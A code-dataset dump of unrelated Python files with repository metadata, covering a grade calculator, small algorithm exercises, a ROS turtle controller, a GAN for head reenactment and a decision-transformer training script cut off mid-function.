seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
13266366822 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# n=20,m=3,x=5
# n个人,报m出列,留下x个人
people = list(range(1, 21))
while len(people) > 5:
i = 1
while i < 3:
people.append(people.pop(0))
i += 1
print('{}号被淘汰了'.format(people.pop(0)))
| feiyu7348/python-Learning | 算法/约瑟夫环.py | 约瑟夫环.py | py | 283 | python | en | code | 0 | github-code | 90 |
18392605829 | import sys
input = sys.stdin.readline
N, A, B, C, D = map(int, input().split())
S = list(input())[: -1]
tri = 0
for i in range(min(A, B) - 1, max(C, D) - 1):
if S[i] == "#" and (S[i + 1] == "#"):
print("No")
exit(0)
for i in range(max(A, B) - 1, min(C, D)):
if S[i] == "." and (S[i - 1] == ".") and (S[i + 1] == "."): tri = 1
if C <= D:
print("Yes")
else:
if tri: print("Yes")
else: print("No")
| Aasthaengg/IBMdataset | Python_codes/p03017/s915018796.py | s915018796.py | py | 413 | python | en | code | 0 | github-code | 90 |
25743122284 | from f_utils import u_tester
from model.point import Point
from model.grid_blocks import GridBlocks
from logic import u_points
class TestPoints:
def __init__(self):
u_tester.print_start(__file__)
TestPoints.__tester_nearest()
TestPoints.__tester_distances()
TestPoints.__tester_distances_to()
TestPoints.__tester_distance_rows()
TestPoints.__tester_distance_cols()
u_tester.print_finish(__file__)
@staticmethod
def __tester_nearest():
point_a = Point(0, 0)
points_b = {Point(2, 0), Point(0, 1), Point(1, 2)}
nearest_test = u_points.nearest(point_a, points_b)
nearest_true = {Point(0, 1): 1, Point(2, 0): 2, Point(1, 2):3}
p0 = nearest_test == nearest_true
u_tester.run(p0)
@staticmethod
def __tester_distances_to():
point_a = Point(0, 0)
points_b = [Point(0, 1), Point(1, 1), Point(2, 2), Point(2, 2)]
distances_test = u_points.distances_to(point_a, points_b)
distances_true = 2
p0 = distances_test == distances_true
u_tester.run(p0)
@staticmethod
def __tester_distances():
points = [Point(0, 0), Point(1, 1), Point(2, 2), Point(1, 2)]
distances_test = u_points.distances(points)
p0 = distances_test == 3.25
u_tester.run(p0)
@staticmethod
def __tester_distance_rows():
points_a = [Point(3, 3)]
points_b = [Point(5, 5)]
distance_test = u_points.distance_rows(points_a, points_b)
p0 = distance_test == 2
points_b = [Point(5, 5), Point(7, 7)]
distance_test = u_points.distance_rows(points_a, points_b)
p1 = distance_test == 3
points_a = [Point(3, 3), Point(4, 4)]
distance_test = u_points.distance_rows(points_a, points_b)
p2 = distance_test == 2.5
u_tester.run(p0, p1, p2)
@staticmethod
def __tester_distance_cols():
points_a = [Point(3, 3)]
points_b = [Point(5, 4)]
distance_test = u_points.distance_cols(points_a, points_b)
p0 = distance_test == 1
points_b = [Point(5, 5), Point(7, 6)]
distance_test = u_points.distance_cols(points_a, points_b)
p1 = distance_test == 2.5
points_a = [Point(3, 3), Point(4, 3)]
distance_test = u_points.distance_cols(points_a, points_b)
p2 = distance_test == 2.5
u_tester.run(p0, p1, p2)
if __name__ == '__main__':
TestPoints()
| valdas1966/kg | logic/testers/t_points.py | t_points.py | py | 2,477 | python | en | code | 0 | github-code | 90 |
6242448796 | def status(marks):
if marks>=35:
s="p"
else:
s="f"
return s
def find_grade(marks):
if marks>=75:
g="a+"
elif marks>=60:
g="a"
elif marks>=50:
g="b"
else:
if status(marks)=="f":
g="f"
else:
g="c"
return g
def bl_count(s1,s2,s3,s4,s5,s6):
c=0
if status(s1)=="f":
c+=1
if status(s2)=="f":
c+=1
if status(s3)=="f":
c+=1
if status(s4)=="f":
c+=1
if status(s5)=="f":
c+=1
if status(s6)=="f":
c+=1
return c
def tot_score(s1,s2,s3,s4,s5,s6):
return s1+s2+s3+s4+s5+s6
def per(total):
return total//6
def valid(s1,s2,s3,s4,s5,s6):
#write your code here
if (s1>=0 and s1<=100) and (s2>=0 and s2<=100) and (s3>=0 and s3<=100) and (s4>=0 and s4<=100) and (s5>=0 and s5<=100) and (s6>=0 and s6<=100):
return True
else:
return False
s1,s2,s3,s4,s5,s6=map(int,input().split())
if valid(s1,s2,s3,s4,s5,s6):
print("english",s1,100,status(s1),find_grade(s1))
print("telugu",s2,100,status(s2),find_grade(s2))
print("hindi",s3,100,status(s3),find_grade(s3))
print("maths",s4,100,status(s4),find_grade(s4))
print("science",s5,100,status(s5),find_grade(s5))
print("social",s6,100,status(s6),find_grade(s6))
total = tot_score(s1,s2,s3,s4,s5,s6)
per = per(total)
bl= bl_count(s1,s2,s3,s4,s5,s6)
print("Backlog count",bl)
print("Total",total)
print("Percentage",per)
if bl == 0:
print(find_grade(per))
else:
print("Fail")
else:
print("Invalid Scores")
| GondiJhansi/Python_K3 | Stud_Stat_Grade.py | Stud_Stat_Grade.py | py | 1,706 | python | en | code | 0 | github-code | 90 |
73943434537 | import os
import dotenv
from pymongo import MongoClient
dotenv.load_dotenv()
dburl = os.getenv("URL")
#password= os.getenv ("pass")
print(dburl)
if not dburl:
raise ValueError("no tienes url mongodb")
client = MongoClient(dburl)
db = client.get_database()
collection = db["politicos"]
#client = pymongo.MongoClient("mongodb+srv://asiokfd:<" + pass + ">@cluster0.zlghr.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
#db = client.test | asiokfd/Proyecto4 | config/configuration.py | configuration.py | py | 470 | python | en | code | 0 | github-code | 90 |
13524095798 | attack_categories = {
"normal": {
"normal"
},
"dos": {
"mailbomb",
"back",
"land",
"neptune",
"pod",
"smurf",
"teardrop",
"apache2",
"udpstorm",
"processtable"
},
"u2r": {
"buffer_overflow",
"loadmodule",
"perl",
"rootkit",
"sqlattack",
"xterm",
"httptunnel",
"ps"
},
"r2l": {
"guess_passwd",
"ftp_write",
"imap",
"phf",
"multihop",
"warezmaster",
"warezclient",
"spy",
"xlock",
"xsnoop",
"snmpguess",
"snmpgetattack",
"sendmail",
"named",
"worm"
},
"probe": {
"satan",
"ipsweep",
"nmap",
"portsweep",
"mscan",
"saint"
}
}
| abriehalgryn/IntrusionDetection-With-SVM-and-PCA | attack_categories.py | attack_categories.py | py | 841 | python | en | code | 0 | github-code | 90 |
32730590883 | import os
import sys
multivalued = False
input_format = 'bnet'
url = 'https://github.com/hklarner/PyBoolNet/releases/download/v2.1/PyBoolNet-2.1_linux64.tar.gz'
folder = os.path.abspath(os.path.split(__file__)[0])
pypath = os.path.join(folder, 'source', 'PyBoolNet-2.1')
sys.path.insert(0,pypath)
#print(pypath)
try:
import PyBoolNet
is_installed = True
except:
is_installed = False
| colomoto/colomoto-benchmarks | tools/PyBoolNet/config.py | config.py | py | 401 | python | en | code | 1 | github-code | 90 |
73820408617 | class Solution:
def numPermsDISequence(self, S: str) -> int:
size = len(S) + 1
dp = [[0] * size for _ in range(size)]
dp[0][0] = 1
for i in range(1, size):
for j in range(i + 1):
if S[i - 1] == 'D':
for k in range(j, i):
dp[i][j] += dp[i - 1][k]
elif S[i - 1] == 'I':
for k in range(j):
dp[i][j] += dp[i - 1][k]
return sum(dp[-1]) % (10 ** 9 + 7)
| HarrrrryLi/LeetCode | 903. Valid Permutations for DI Sequence/Python 3/solution.py | solution.py | py | 523 | python | en | code | 0 | github-code | 90 |
28142849770 | #!/usr/bin/env python3
import rospy
from sensor_msgs.msg import LaserScan
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
import math
from math import cos, sin
# Global variables to store the closest point of laserscan coordinates
LASERSCAN_X = 0.0
LASERSCAN_Y = 0.0
# Global variables to store the closest point of laserscan coordinates
CURRENT_POSE_X = 0.0
CURRENT_POSE_Y = 0.0
CURRENT_POSE_THETA = 0.0
def scan_callback(data):
global LASERSCAN_X, LASERSCAN_Y
ranges = data.ranges
# Filter out NaN values
valid_ranges = [r for r in ranges if not math.isnan(r)]
# Find the index of the closest point
min_index = ranges.index(min(valid_ranges))
# Calculate the x and y coordinates of the closest point
closest_range = ranges[min_index]
angle = data.angle_min + min_index * data.angle_increment
LASERSCAN_X = closest_range * cos(angle)
LASERSCAN_Y = closest_range * sin(angle)
def pose_callback(data):
global CURRENT_POSE_X, CURRENT_POSE_Y, CURRENT_POSE_THETA
CURRENT_POSE_X = data.x
CURRENT_POSE_Y = data.y
CURRENT_POSE_THETA = data.theta
def publish_closest_point(pub):
global LASERSCAN_X, LASERSCAN_Y, CURRENT_POSE_X, CURRENT_POSE_Y, CURRENT_POSE_THETA
# The center of the turtle seems to be 5.5, 5.5
current_pose_x = CURRENT_POSE_X - 5.5
current_pose_y = CURRENT_POSE_Y - 5.5
# The laserscan starts at 0.5 m and should just be used for 0.2m,
# so that the center is at 0.55 m.
# The y component can be left as it is.
laserscan_x = (LASERSCAN_X-0.55)
laserscan_y = (LASERSCAN_Y)
# Adjust x and y value and if the closest point is to far just stopt the turtle
if laserscan_x<-0.05 or laserscan_x>0.05:
control_input_x=0.0
control_input_y=0.0
rospy.loginfo("Stopped!")
else:
#Make values extremer to need less movement
laserscan_x = laserscan_x*100
laserscan_y = laserscan_y*50
# Constants for PID controller
KP = 0.5 # Proportional gain
KI = 0.1 # Integral gain
KD = 0.2 # Derivative gain
# Initialize variables
previous_error_x = 0
previous_error_y = 0
integral_x = 0
integral_y = 0
# Calculate the error - x and y are turned because the are defined in that way
error_x = laserscan_y - current_pose_x
error_y = -laserscan_x - current_pose_y
# Calculate the PID components for each axis
proportional_x = KP * error_x
integral_x += KI * error_x
derivative_x = KD * (error_x - previous_error_x)
proportional_y = KP * error_y
integral_y += KI * error_y
derivative_y = KD * (error_y - previous_error_y)
# Calculate the control inputs for each axis
control_input_x = proportional_x + integral_x + derivative_x
control_input_y = proportional_y + integral_y + derivative_y
# Update the previous errors
previous_error_x = error_x
previous_error_y = error_y
# Create and publish the Twist message
twist = Twist()
twist.linear.x = control_input_x
twist.linear.y = control_input_y
twist.angular.z = 0.0 # Assuming no angular control needed
pub.publish(twist)
# Print Poses to log
rospy.loginfo("Current pose (x, y): ({}, {})".format(current_pose_x, current_pose_y))
rospy.loginfo("Wished pose (x, y): ({}, {})".format(laserscan_x, laserscan_y))
# Print Speed to log
rospy.loginfo("Current speed (x, y): ({}, {})".format(control_input_x, control_input_y))
#LASERSCAN_X = 0.0
#LASERSCAN_Y = 0.0
def listener():
rospy.init_node('scan_subscriber', anonymous=True)
rospy.Subscriber('/scan', LaserScan, scan_callback)
rospy.Subscriber('/turtle1/pose', Pose,pose_callback)
# Initialize publisher
pub = rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size=10)
rate = rospy.Rate(10) # 10 Hz
while not rospy.is_shutdown():
publish_closest_point(pub)
rate.sleep()
if __name__ == '__main__':
listener()
| mikejosef10/conturtle | kinect_writter/scripts/laserscan_to_cmdVel.py | laserscan_to_cmdVel.py | py | 4,187 | python | en | code | 0 | github-code | 90 |
35374126596 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import os
import sys
import math
from collections import OrderedDict
from torch.autograd import Variable
import util.util as util
from .base_model import BaseModel
from . import networks
from .flownet2_pytorch.networks.resample2d_package.resample2d import Resample2d
########################
#### Discriminators ####
########################
class Head2HeadModelD(BaseModel):
def name(self):
return 'Head2HeadModelD'
def initialize(self, opt):
BaseModel.initialize(self, opt)
self.gpu_ids = opt.gpu_ids
self.n_frames_D = opt.n_frames_D
self.output_nc = opt.output_nc
self.input_nc = opt.input_nc
self.resample = Resample2d()
# Image discriminator
netD_input_nc = self.input_nc + opt.output_nc
self.netD = networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt)
# Mouth, Eyes discriminator
if not opt.no_mouth_D:
self.netDm = networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt)
if opt.use_eyes_D:
self.netDe = networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt)
# Dynamics discriminator
netD_input_nc = opt.output_nc * opt.n_frames_D + 2 * (opt.n_frames_D-1)
for s in range(opt.n_scales_temporal):
setattr(self, 'netD_T'+str(s), networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt))
# load networks
if (opt.continue_train or opt.load_pretrain):
self.load_network(self.netD, 'D', opt.which_epoch, opt.load_pretrain)
if not opt.no_mouth_D:
self.load_network(self.netDm, 'Dm', opt.which_epoch, opt.load_pretrain)
if opt.use_eyes_D:
self.load_network(self.netDe, 'De', opt.which_epoch, opt.load_pretrain)
for s in range(opt.n_scales_temporal):
self.load_network(getattr(self, 'netD_T'+str(s)), 'D_T'+str(s), opt.which_epoch, opt.load_pretrain)
print('---------- Discriminators loaded -------------')
else:
print('---------- Discriminators initialized -------------')
# set loss functions and optimizers
self.old_lr = opt.lr
# define loss functions
self.criterionGAN = networks.GANLoss(opt.gan_mode, tensor=self.Tensor)
self.criterionWarp = networks.MaskedL1Loss()
self.criterionFeat = torch.nn.L1Loss()
if not opt.no_vgg:
self.criterionVGG = networks.VGGLoss(self.gpu_ids[0])
self.loss_names = ['G_VGG', 'G_GAN', 'G_GAN_Feat', 'D_real', 'D_fake', 'G_Warp']
self.loss_names_T = ['G_T_GAN', 'G_T_GAN_Feat', 'D_T_real', 'D_T_fake']
if not opt.no_mouth_D:
self.loss_names += ['Gm_GAN', 'Gm_GAN_Feat', 'Dm_real', 'Dm_fake']
if opt.use_eyes_D:
self.loss_names += ['Ge_GAN', 'Ge_GAN_Feat', 'De_real', 'De_fake']
beta1, beta2 = opt.beta1, 0.999
lr = opt.lr
# initialize optimizers
params = list(self.netD.parameters())
if not opt.no_mouth_D:
params += list(self.netDm.parameters())
if opt.use_eyes_D:
params += list(self.netDe.parameters())
self.optimizer_D = torch.optim.Adam(params, lr=lr, betas=(beta1, beta2))
for s in range(opt.n_scales_temporal):
params = list(getattr(self, 'netD_T'+str(s)).parameters())
optimizer_D_T = torch.optim.Adam(params, lr=lr, betas=(beta1, beta2))
setattr(self, 'optimizer_D_T'+str(s), optimizer_D_T)
def compute_D_losses(self, netD, real_A, real_B, fake_B):
# Input
real_AB = torch.cat((real_A, real_B), dim=1)
fake_AB = torch.cat((real_A, fake_B), dim=1)
# D losses
pred_real = netD.forward(real_AB)
pred_fake = netD.forward(fake_AB.detach())
loss_D_real = self.criterionGAN(pred_real, True, isG=False)
loss_D_fake = self.criterionGAN(pred_fake, False, isG=False)
# G losses
pred_fake = netD.forward(fake_AB)
loss_G_GAN = self.criterionGAN(pred_fake, True, isG=True)
loss_G_GAN_Feat = self.FM_loss(pred_real, pred_fake)
return loss_D_real, loss_D_fake, loss_G_GAN, loss_G_GAN_Feat
def compute_D_T_losses(self, real_B, fake_B, flow_ref, conf_ref, D_T_scale):
# Input
netD_T = getattr(self, 'netD_T'+str(D_T_scale))
real_B = real_B.view(-1, self.output_nc * self.n_frames_D, self.height, self.width)
fake_B = fake_B.view(-1, self.output_nc * self.n_frames_D, self.height, self.width)
if flow_ref is not None:
flow_ref = flow_ref.view(-1, 2 * (self.n_frames_D-1), self.height, self.width)
real_B = torch.cat([real_B, flow_ref], dim=1)
fake_B = torch.cat([fake_B, flow_ref], dim=1)
# D_T losses
pred_real = netD_T.forward(real_B)
pred_fake = netD_T.forward(fake_B.detach())
loss_D_T_real = self.criterionGAN(pred_real, True, isG=False)
loss_D_T_fake = self.criterionGAN(pred_fake, False, isG=False)
# G losses
pred_fake = netD_T.forward(fake_B)
loss_G_T_GAN = self.criterionGAN(pred_fake, True, isG=True)
loss_G_T_GAN_Feat = self.FM_loss(pred_real, pred_fake)
return loss_D_T_real, loss_D_T_fake, loss_G_T_GAN, loss_G_T_GAN_Feat
def FM_loss(self, pred_real, pred_fake):
if not self.opt.no_ganFeat:
loss_G_GAN_Feat = 0
feat_weights = 4.0 / (self.opt.n_layers_D + 1)
D_weights = 1.0 / self.opt.num_D
for i in range(min(len(pred_fake), self.opt.num_D)):
for j in range(len(pred_fake[i])-1):
loss_G_GAN_Feat += D_weights * feat_weights * \
self.criterionFeat(pred_fake[i][j], pred_real[i][j].detach()) * self.opt.lambda_feat
else:
loss_G_GAN_Feat = torch.zeros(1, 1).cuda()
return loss_G_GAN_Feat
def forward(self, D_T_scale, tensors_list, mouth_centers=None, eyes_centers=None):
is_temporal_D = D_T_scale != 0
lambda_feat = self.opt.lambda_feat
lambda_warp = self.opt.lambda_warp
tD = self.opt.n_frames_D
if is_temporal_D:
# Losses from Dynamics Discriminators
real_B, fake_B, flow_ref, conf_ref = tensors_list
_, _, _, self.height, self.width = real_B.size()
loss_D_T_real, loss_D_T_fake, loss_G_T_GAN, loss_G_T_GAN_Feat = self.compute_D_T_losses(real_B, fake_B, flow_ref/20, conf_ref, D_T_scale-1)
loss_list = [loss_G_T_GAN, loss_G_T_GAN_Feat, loss_D_T_real, loss_D_T_fake]
loss_list = [loss.unsqueeze(0) for loss in loss_list]
return loss_list
else:
real_B, fake_B, real_A, real_B_prev, fake_B_prev, flow_ref, conf_ref = tensors_list
_, _, self.height, self.width = real_B.size()
#################### Losses ####################
# VGG loss
loss_G_VGG = (self.criterionVGG(fake_B, real_B) * lambda_feat) if not self.opt.no_vgg else torch.zeros(1, 1).cuda()
# GAN loss for Generator
loss_D_real, loss_D_fake, loss_G_GAN, loss_G_GAN_Feat = self.compute_D_losses(self.netD, real_A, real_B, fake_B)
# mWarp loss
fake_B_warp_ref = self.resample(fake_B_prev, flow_ref)
loss_G_Warp = self.criterionWarp(fake_B, fake_B_warp_ref.detach(), conf_ref) * lambda_warp
loss_list = [loss_G_VGG, loss_G_GAN, loss_G_GAN_Feat, loss_D_real, loss_D_fake, loss_G_Warp]
if not self.opt.no_mouth_D:
# Extract mouth region around the center.
real_A_mouth, real_B_mouth, fake_B_mouth = util.get_ROI([real_A, real_B, fake_B], mouth_centers, self.opt)
# Losses for mouth discriminator
loss_Dm_real, loss_Dm_fake, loss_Gm_GAN, loss_Gm_GAN_Feat = self.compute_D_losses(self.netDm, real_A_mouth, real_B_mouth, fake_B_mouth)
mouth_weight = 1
loss_Gm_GAN *= mouth_weight
loss_Gm_GAN_Feat *= mouth_weight
loss_list += [loss_Gm_GAN, loss_Gm_GAN_Feat, loss_Dm_real, loss_Dm_fake]
if self.opt.use_eyes_D:
# Extract eyes region around the center.
real_A_eyes, real_B_eyes, fake_B_eyes = util.get_ROI([real_A, real_B, fake_B], eyes_centers, self.opt)
# Losses for eyes discriminator
loss_De_real, loss_De_fake, loss_Ge_GAN, loss_Ge_GAN_Feat = self.compute_D_losses(self.netDe, real_A_eyes, real_B_eyes, fake_B_eyes)
eyes_weight = 1
loss_Ge_GAN *= eyes_weight
loss_Ge_GAN_Feat *= eyes_weight
loss_list += [loss_Ge_GAN, loss_Ge_GAN_Feat, loss_De_real, loss_De_fake]
loss_list = [loss.unsqueeze(0) for loss in loss_list]
return loss_list
def save(self, label):
self.save_network(self.netD, 'D', label, self.gpu_ids)
if not self.opt.no_mouth_D:
self.save_network(self.netDm, 'Dm', label, self.gpu_ids)
if self.opt.use_eyes_D:
self.save_network(self.netDe, 'De', label, self.gpu_ids)
for s in range(self.opt.n_scales_temporal):
self.save_network(getattr(self, 'netD_T'+str(s)), 'D_T'+str(s), label, self.gpu_ids)
def update_learning_rate(self, epoch):
lr = self.opt.lr * (1 - (epoch - self.opt.niter) / self.opt.niter_decay)
for param_group in self.optimizer_D.param_groups:
param_group['lr'] = lr
print('update learning rate: %f -> %f' % (self.old_lr, lr))
self.old_lr = lr
##########################
#### Generator model ####
##########################
class Head2HeadModelG(BaseModel):
def name(self):
return 'Head2HeadModelG'
def initialize(self, opt):
BaseModel.initialize(self, opt)
self.isTrain = opt.isTrain
self.n_frames_G = opt.n_frames_G
input_nc = opt.input_nc
netG_input_nc = input_nc * self.n_frames_G
prev_output_nc = (self.n_frames_G - 1) * opt.output_nc
self.netG = networks.define_G(netG_input_nc, opt.output_nc, prev_output_nc, opt.ngf, opt.n_downsample_G, opt.norm, self.gpu_ids, opt)
# load networks
if not self.isTrain or opt.continue_train or opt.load_pretrain:
self.load_network(self.netG, 'G', opt.which_epoch, opt.load_pretrain)
print('---------- Generator loaded -------------')
else:
print('---------- Generator initialized -------------')
# Otimizer for G
if self.isTrain:
self.old_lr = opt.lr
self.n_frames_backpropagate = self.opt.n_frames_backpropagate
self.n_frames_load = min(self.opt.max_frames_per_gpu, self.opt.n_frames_total)
# initialize optimizer G
params = list(self.netG.parameters())
beta1, beta2 = opt.beta1, 0.999
lr = opt.lr
self.optimizer_G = torch.optim.Adam(params, lr=lr, betas=(beta1, beta2))
def encode_input(self, input_map, real_image):
size = input_map.size()
self.bs, _, self.height, self.width = size[0], size[1], size[3], size[4]
input_map = input_map.data.cuda()
if real_image is not None:
real_image = Variable(real_image.data.cuda())
return input_map, real_image
def forward(self, input_A, input_B, fake_B_prev):
# Feed forward for training
real_A, real_B = self.encode_input(input_A, input_B)
gpu_id = real_A.get_device()
is_first_frame = fake_B_prev is None
if is_first_frame:
if self.opt.no_first_img:
fake_B_prev = Variable(self.Tensor(self.bs, self.n_frames_G-1, self.opt.output_nc, self.height, self.width).zero_())
else:
fake_B_prev = real_B[:,:self.n_frames_G-1,...]
### generate frames sequentially
for t in range(self.n_frames_load):
_, _, _, h, w = real_A.size()
real_A_reshaped = real_A[:, t:t+self.n_frames_G,...].view(self.bs, -1, h, w).cuda(gpu_id)
fake_B_prevs = fake_B_prev[:, t:t+self.n_frames_G-1,...].cuda(gpu_id)
if (t % self.n_frames_backpropagate) == 0:
fake_B_prevs = fake_B_prevs.detach()
fake_B_prevs_reshaped = fake_B_prevs.view(self.bs, -1, h, w)
fake_B = self.netG.forward(real_A_reshaped, fake_B_prevs_reshaped, self.opt.isTrain)
fake_B_prev = self.concatenate_tensors([fake_B_prev, fake_B.unsqueeze(1).cuda(gpu_id)], dim=1)
fake_B = fake_B_prev[:, self.n_frames_G-1:]
fake_B_prev = fake_B_prev[:, -self.n_frames_G+1:].detach()
return fake_B, real_A[:,self.n_frames_G-1:], real_B[:,self.n_frames_G-2:], fake_B_prev
def inference(self, input_A, input_B):
# Feed forward for test
with torch.no_grad():
real_A, real_B = self.encode_input(input_A, input_B)
self.is_first_frame = not hasattr(self, 'fake_B_prev') or self.fake_B_prev is None
if self.is_first_frame:
if self.opt.no_first_img:
fake_B_prev = Variable(self.Tensor(self.bs, self.n_frames_G-1, self.opt.output_nc, self.height, self.width).zero_())
else:
fake_B_prev = real_B[:,:self.n_frames_G-1,...]
self.fake_B_prev = fake_B_prev[0]
_, _, _, h, w = real_A.size()
real_As_reshaped = real_A[0,:self.n_frames_G].view(1, -1, h, w)
fake_B_prevs_reshaped = self.fake_B_prev.view(1, -1, h, w)
fake_B = self.netG.forward(real_As_reshaped, fake_B_prevs_reshaped, self.opt.isTrain)
self.fake_B_prev = torch.cat([self.fake_B_prev[1:,...], fake_B])
return fake_B, real_A[0, -1]
def concatenate_tensors(self, tensors, dim=0):
if tensors[0] is not None and tensors[1] is not None:
if isinstance(tensors[0], list):
tensors_cat = []
for i in range(len(tensors[0])):
tensors_cat.append(self.concatenate_tensors([tensors[0][i], tensors[1][i]], dim=dim))
return tensors_cat
return torch.cat([tensors[0], tensors[1]], dim=dim)
elif tensors[0] is not None:
return tensors[0]
else:
return tensors[1]
def save(self, label):
self.save_network(self.netG, 'G', label, self.gpu_ids)
def update_learning_rate(self, epoch):
lr = self.opt.lr * (1 - (epoch - self.opt.niter) / self.opt.niter_decay)
for param_group in self.optimizer_G.param_groups:
param_group['lr'] = lr
print('update learning rate: %f -> %f' % (self.old_lr, lr))
self.old_lr = lr
| michaildoukas/head2head | models/head2head_model.py | head2head_model.py | py | 15,353 | python | en | code | 286 | github-code | 90 |
70983566056 | import numpy as np
import random
import torch
import wandb
from pipelines.evaluation.evaluate_episodes import evaluate_episode_rtg
from pipelines.training.seq_trainer import SequenceTrainer
from modules.decision_transformer import DecisionTransformer
from prettytable import PrettyTable
def count_parameters(model):
table = PrettyTable(["Modules", "Parameters"])
total_params = 0
for name, parameter in model.named_parameters():
if not parameter.requires_grad: continue
params = parameter.numel()
table.add_row([name, params])
total_params += params
print(table)
print(f"Total Trainable Params: {total_params}")
return total_params
def discount_cumsum(x, gamma):
"""
Compute discounted cumulative sums of future reward.
adopted from https://github.com/kzl/decision-transformer/blob/master/gym/experiment.py
"""
discount_cumsum = np.zeros_like(x)
discount_cumsum[-1] = x[-1]
for t in reversed(range(x.shape[0]-1)):
discount_cumsum[t] = x[t] + gamma * discount_cumsum[t+1]
return discount_cumsum
def train(config, sequences, continue_training=False):
"""
Train a decision transformer on a dataset.
:param config: training configuration
:param sequences: list containing [sequence1, sequence2, ..., sequenceN]
sequence: dict containing {'states': np.array([state1, state2, ..., stateT]),
'actions': np.array([action1, action2, ..., actionT]),
'rewards': np.array([reward1, reward2, ..., rewardT])}
states: np.array of shape (T, *state_dim)
actions: np.array of shape (T, *action_dim)
rewards: np.array of shape (T, )
'dones': np.array([0,0, ..., 1])} -> trivial for our case as we always have one
scene for each episode. Dones is also not used in experiments.
code partially adapted from https://github.com/kzl/decision-transformer/blob/master/gym/experiment.py
"""
assert sequences is not None, 'No sequences provided for training.'
device = config['device']
act_dim = np.squeeze(sequences[0]['actions'].shape[1:])
state_dim = np.squeeze(sequences[0]['states'].shape[1:])
max_ep_len = max([len(path['states']) for path in sequences]) # take it as the longest trajectory
scale = np.mean([len(path['states']) for path in sequences]) # scale for rtg
# train-eval split
eval_size = config.get('eval_size', 500)
eval_sequences = sequences[:eval_size]
sequences = sequences[eval_size:]
# save all sequence information into separate lists
states, traj_lens, returns = [], [], []
for path in sequences:
if config['mode'] == 'delayed': # delayed: all rewards moved to end of trajectory
path['rewards'][-1] = path['rewards'].sum()
path['rewards'][:-1] = 0.
states.append(path['states'])
traj_lens.append(len(path['states']))
returns.append(path['rewards'].sum())
traj_lens, returns = np.array(traj_lens), np.array(returns)
# used for input normalization
input_type = config.get('input_type', 'coord')
states = np.concatenate(states, axis=0)
if input_type == 'grayscale':
# no normalization needed for cnn
state_mean, state_std = np.array(50), np.array(100)
else:
state_mean, state_std = np.mean(states, axis=0), np.std(states, axis=0) + 1e-6
state_mean[[0,5,10,15,20]] = 0
state_std[[0,5,10,15,20]] = 1
num_timesteps = sum(traj_lens)
print('=' * 50)
print(f'Starting new experiment: {config["experiment_name"]}')
print(f'{len(traj_lens)} trajectories, {num_timesteps} timesteps found')
print(f'Average return: {np.mean(returns):.2f}, std: {np.std(returns):.2f}')
print(f'Max return: {np.max(returns):.2f}, min: {np.min(returns):.2f}')
print('=' * 50)
K = config['context_length']
batch_size = config['batch_size']
num_eval_episodes = config['num_eval_episodes']
pct_traj = config['pct_traj']
# only train on top pct_traj trajectories (for %BC experiment)
num_timesteps = max(int(pct_traj * num_timesteps), 1)
sorted_inds = np.argsort(returns) # lowest to highest return
num_trajectories = 1
timesteps = traj_lens[sorted_inds[-1]]
ind = len(sequences) - 2
while ind >= 0 and timesteps + traj_lens[sorted_inds[ind]] <= num_timesteps:
timesteps += traj_lens[sorted_inds[ind]]
num_trajectories += 1
ind -= 1
sorted_inds = sorted_inds[-num_trajectories:]
# used to reweight sampling so we sample according to timesteps instead of trajectories
p_sample = traj_lens[sorted_inds] / sum(traj_lens[sorted_inds])
def get_batch(batch_size=256, max_len=K, eval=False):
batch_inds = np.random.choice(
np.arange(num_trajectories),
size=batch_size,
replace=True,
# p=p_sample, # reweights so we sample according to timesteps
) if not eval else np.arange(len(eval_sequences))
if eval:
batch_size = len(eval_sequences)
s, a, r, d, rtg, timesteps, mask = [], [], [], [], [], [], []
for i in range(batch_size):
traj = sequences[int(sorted_inds[batch_inds[i]])] if not eval else eval_sequences[batch_inds[i]]
si = random.randint(1, traj['rewards'].shape[0] - 1)
# get sequences from dataset
s.append(traj['states'][max(si - max_len, 0):si].reshape(1, -1, state_dim))
a.append(traj['actions'][max(si - max_len, 0):si].reshape(1, -1, act_dim))
r.append(traj['rewards'][max(si - max_len, 0):si].reshape(1, -1, 1))
if 'terminals' in traj:
d.append(traj['terminals'][max(si - max_len, 0):si].reshape(1, -1))
else:
d.append(traj['dones'][max(si - max_len, 0):si].reshape(1, -1))
timesteps.append(np.arange(max(si - max_len, 0), max(si - max_len, 0) + s[-1].shape[1]).reshape(1, -1))
timesteps[-1][timesteps[-1] >= max_ep_len] = max_ep_len - 1 # padding cutoff
rtg.append(
discount_cumsum(traj['rewards'][max(si - max_len, 0):si], gamma=1.)[:s[-1].shape[1] + 1].reshape(1, -1,
1))
if rtg[-1].shape[1] <= s[-1].shape[1]:
rtg[-1] = np.concatenate([rtg[-1], np.zeros((1, 1, 1))], axis=1)
# padding and state + reward normalization
tlen = s[-1].shape[1]
s[-1] = (s[-1] - state_mean) / state_std
s[-1] = np.concatenate([np.zeros((1, max_len - tlen, state_dim)), s[-1]], axis=1)
a[-1] = np.concatenate([np.ones((1, max_len - tlen, act_dim)) * 0, a[-1]], axis=1)
r[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), r[-1]], axis=1)
d[-1] = np.concatenate([np.ones((1, max_len - tlen)) * 2, d[-1]], axis=1)
